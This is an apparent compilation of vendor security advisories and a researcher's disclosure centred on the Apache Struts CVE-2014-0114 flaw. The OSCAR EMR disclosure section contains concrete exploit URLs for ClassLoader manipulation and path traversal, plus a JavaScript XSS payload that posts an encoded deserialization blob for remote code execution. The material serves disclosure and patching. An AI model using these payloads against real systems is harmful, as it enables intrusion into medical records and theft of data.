bouncycastle: DSA does not fully validate ASN.1 encoding during signature\nverification allowing for injection of unsigned data (CVE-2016-1000338)\n\n* bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)\n\n* bouncycastle: Information exposure in DSA signature generation via timing\nattack (CVE-2016-1000341)\n\n* bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n(CVE-2016-1000342)\n\n* bouncycastle: DHIES implementation allowed the use of ECB mode\n(CVE-2016-1000344)\n\n* bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle\nattack (CVE-2016-1000345)\n\n* bouncycastle: Other party DH public keys are not fully validated\n(CVE-2016-1000346)\n\n* bouncycastle: ECIES implementation allowed the use of ECB mode\n(CVE-2016-1000352)\n\n* async-http-client: Invalid URL parsing with \u0027?\u0027 (CVE-2017-14063)\n\n* undertow: File descriptor leak caused by\nJarURLConnection.getLastModified() allows attacker to cause a denial of\nservice (CVE-2018-1114)\n\n* spring-framework: Directory traversal vulnerability with static resources\non Windows filesystems (CVE-2018-1271)\n\n* tika: Infinite loop in BPGParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1338)\n\n* tika: Infinite loop in ChmParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1339)\n\n* pdfbox: Infinite loop in AFMParser.java allows for out of memory erros\nvia crafted PDF (CVE-2018-8036)\n\n* jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)\n\n* bouncycastle: flaw in the low-level interface to RSA key pair generator\n(CVE-2018-1000180)\n\n* bouncycastle: Carry propagation bug in math.raw.Nat??? class\n(CVE-2016-1000340)\n\n* bouncycastle: DSA key pair generator generates a weak private key by\ndefault (CVE-2016-1000343)\n\n* spring-framework: Multipart content pollution (CVE-2018-1272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088. \n\nInstallation instructions are located in the download section of the\ncustomer portal. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with \u0027?\u0027\n1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands\n1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution\n1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution\n1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet\n1564408 - CVE-2018-1272 spring-framework: Multipart content pollution\n1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems\n1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service\n1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service\n1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service\n1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator\n1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data\n1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode\n1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack\n1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated\n1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode\n1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class\n1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class\n1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack\n1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default\n1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF\n\n5. Summary:\n\nFuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security\nupdate that addresses one security issue, is now available from the Red Hat\nCustomer Portal. \nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named \u0027oscarSecurityManager\u0027 is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i \u003c binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display\u0026doc_no=X\u0026providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. \n\nReferences:\n\nCVE-2014-0114 (SSRT101662)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nSiteScope Affected version\n Resolution patch details\n Link to download\n\n11.1x\n SiteScope 11.13 Windows 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00315\n\n SiteScope 11.13 Windows 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00316\n\n SiteScope 11.13 Linux 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00317\n\n SiteScope 11.13 Linux 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00318\n\n SiteScope 11.13 Solaris 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00319\n\n SiteScope 11.13 Solaris 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00320\n\n11.2x\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00321\n\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00322\n\n SiteScope 11.24.271 Intermediate Patch for Linux\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00323\n\n SiteScope 11.24.271 Intermediate Patch for Solaris\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00324\n\nHISTORY\nVersion:1 (rev.1) - 12 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat A-MQ Broker 7.5 release and security update\nAdvisory ID: RHSA-2019:2995-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2995\nIssue date: 2019-10-10\nKeywords: amq,messaging,integration,broker\nCross references: RHEA-2019:45713-01\nCVE Names: CVE-2014-0114\n====================================================================\n1. Summary:\n\nRed Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red\nHat A-MQ Broker 7.4.1, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-0114\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=jboss.amq.broker\u0026version=7.5.0\nhttps://access.redhat.com/documentation/en-us/red_hat_amq/7.5/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7\ngh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso\nQlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ\nqWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m\nGLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm\nYcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv\nSTakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7\nmPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts\nUYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No\nRuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG\nlRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm\n9D+Pu+r8KbU=kdcn\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n - CVE-2015-5652 - Python, elevation of privilege\n - CVE-2013-6429 - Spring Framework, cross-site request forgery\n - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP SiteScope Monitors Software Series 11.2xa11.32IP1\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2013-6429\n 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0050\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0107\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0114\n 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-3253\n 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-5652\n 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-0763\n 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. \n\n **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be can found in the personal zone in \"my updates\" in\nHPE Software Support Online: \u003chttps://softwaresupport.hpe.com\u003e. \n\n\n * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251\u003e\n\n\n * Apache Struts: KM02553983 (CVE-2014-0114):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983\u003e\n\n\n * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990\u003e\n\n * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991\u003e\n\n * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n +\n\u003chttps://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992\u003e\n\n * Python: KM02553997 